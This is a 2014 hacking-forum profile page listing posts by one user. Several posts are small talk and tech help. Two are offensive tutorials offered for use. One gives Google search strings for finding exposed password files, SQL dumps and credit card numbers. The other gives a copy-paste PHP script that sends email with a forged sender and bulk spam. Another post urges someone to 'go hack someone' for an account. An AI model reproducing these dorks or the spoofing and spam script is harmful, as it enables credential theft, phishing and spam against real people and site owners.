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Messages - Nero

Pages: [1]
General discussion / I will be "afk" for a while
« on: June 26, 2014, 06:20:19 PM »
Sorry guys, I will not be here for awhile, maybe like a few weeks of me being "afk"(lol), so I won't be on the IRC much. My internet has been going on and off for awhile, and that's what caused by recent absence. Whenever I get internet back, I will be back.

Thanks babes,

Hacking and Security / Re: Malware I Got In An EMail Attachment
« on: June 17, 2014, 02:43:10 AM »
I find this handy for script kiddies. I have no use for it however.

Lol if I'm understand what you are saying correctly, you could use a Google dork to list some vulnerable SQL files.

But I get what you mean. I'll try it later.

News and Announcements / Re: IRC network down 11/06-12/06
« on: June 12, 2014, 03:16:06 AM »
Damn that sucks.

Hope you had a good vacation.

Hacking and Security / Re: Whats the best OS for hacking?
« on: June 09, 2014, 09:22:33 PM »
Well, I suggest Kali Linux but Phage hates it, so we shouldn't speak of it. But there is many distros of Linux that are made for hacking like Anonymous-OS or something.

If you want to run Windows and Linux, just download VirtualBox or VMWare and get the .iso and install it there. Then you can have an OS in a window or fullscreen.

I say, who cares?

Get another account or borrow a friends.

If you feel lucky, go hack someone.

Don't like any of the suggestions? Get a cracked launcher.

Cracked still has some servers.  Just not all.

Deal with it.

Found it on the Webs / Vulnerable Sites
« on: May 27, 2014, 12:36:27 PM »
Just found a cool Google Dork code that allows you to find download sessions that are vulnerable.

Goto this link to see a good list:

Tutorials / Google Dorking
« on: May 26, 2014, 01:42:48 AM »
Google Dorking is a famous way of hacking, and its incredibly simple. Theres a whole database of the code at which you can use. It's used to get passwords, find website vulnerabilities, insecure admin panels, etc.

Lets talk about the simple code, and find passwords:

This is to find filetypes, such as "filetype:sql",(or for what the tutorial is, we use .txt) Which will display websites that have SQL files on the site, which you can use to find MySQL table information.

This is to see whats the title of a website. Such as "Passwords.txt" or something. So it looks like "inurl:passwords".

If you put these two together you would google this:
filetype:txt inurl:"Passwords".
This is just an example and might not always have password files, but the more you learn you can find constant working ones such as
ext:sql intext:password

That one will find gmail passwords, or credit card numbers or anything in between.

If you goto you can find TONS of these, and the ones that aren't there can be Googled or searched on YouTube. Anything is possible, from hacking and moving security cameras across the world, to hacking PayPal accounts.

It's all in your hands babies

Tutorials / Re: Email Spoofing
« on: May 20, 2014, 01:28:00 PM »
SMTP port 25 of your ISP's relay?
That's all I did on my website and it worked, just making sure the host had the main functions lol

Horrid c/p and that php code? man you cray!Oh and a webserver that has mail() enabled too, yeah... let's not forget the core function that actually does the sending.
That's true. But that's all to my hosting provider which is iPage.

Staff note: such hacking skillz, yet you fail to locate the modify button, for the second time...
Not true, I found it easily. It's at the bottom right hand corner. LOL
OR at the top right of a post

Tutorials / Email Spoofing
« on: May 19, 2014, 10:17:34 PM »
Greetings everyone!
This is probably well known, but for the noobs here I'd like to give a tutorial on email spoofing. But you may be asking, "what is email spoofing?". Well, it's pretty simple. It's faking an email, real or fake.

It can be legit like or fake like

Anything is possible.

To the tutorial babies.
All you need is one basic file in PHP, which in fact, you can copy and paste.
(Note this tutorial includes, an email spammer, and faker)

Heres index.php:
Code: [Select]
<h1>Email Spoof</h1> <p><b>USE AT OWN RISK</b></p> <? // error_reporting (0); if(!set_time_limit(0)) { $limit = false; } else { set_time_limit(0); ignore_user_abort(1); $limit = true; } $log = 'log.txt'; // Log file ini_set('max_execution_time', '0'); ?> <? $ip = getenv('REMOTE_ADDR'); if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3') { $_POST['to'] = stripslashes($_POST['to']); $_POST['msg'] = stripslashes($_POST['msg']); $_POST['from'] = stripslashes($_POST['from']); $_POST['subject'] = stripslashes($_POST['subject']); if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe']) { $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n"; $headers .= "From: ".$_POST['from']; $fz=$headers; if($_GET['mail'] == '1') { mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); } elseif($_GET['mail'] == '2') { $_POST['to'] = explode("\n",$_POST['to']); foreach($_POST['to'] as $poluchatels) { mail($poluchatels, $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); } } elseif($_GET['mail'] == '3') { if(preg_match('/[0-9]+/',$_POST['kol'])) { $f = fopen($log,'a'); fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n"); fclose($f); for($i=0;$i<$_POST['kol'];$i++) { $r=rand(1,10000); $headers=$fz.$r."\n"; mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); sleep(1); $headers=$fz; } } else { echo('Incorrect (or not entered) number of messages'); } } $f = fopen($log,'a'); fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n"); fclose($f); echo('<center><b><font color="green">Message succesfully sent</font></b></center>'); } else { ?> <form style="width:350px" method='post'> <? if($_GET['mail'] == '1' || $_GET['mail'] == '3') { echo("Receiver &nbsp;<input type='text'name='to'><br>"); } ?> Sender <input type='text' name='from'><br> Subject &nbsp;<input type='text' name='subject'><br> <? if($_GET['mail'] == '3') { echo("Amount of messages <input type='text' name='kol'><br>"); } ?> <br> htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br> <? if($_GET['mail'] == '2') { echo("Receivers<br><textarea name='to' rows='10' cols='30'></textarea>"); } ?> <br>Message<br> <textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'> </form> <? } } else { ?><br> <a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple fake message</a><br> <a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam 1</a><br><a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Spam 2</a><br> <? 
If this doesn't work, its because of spacing and you should see

It runs on toggle() in JS.[/font][/size]
Not much of a tutorial, more of a giveaway.[/font][/size]
Please note that email spoofing needs a website to be run on, and emails can be limited on servers, and it may not be included at all. SO check with your hosting provider.

Note this is at your own risk.

Hacking and Security / Re: Problem with linux
« on: May 19, 2014, 02:33:11 AM »
This might be because you used wubi instead of a CD. But I am not sure, and didn't really check replies from anyone else.

But try to reinstall with a CD, that could fix your problem, and if you used a CD just boot the disc and repair it or upgrade to a higher version of whatever distro you are using.

Message me if none of this worked, I can still help.


Pages: [1]

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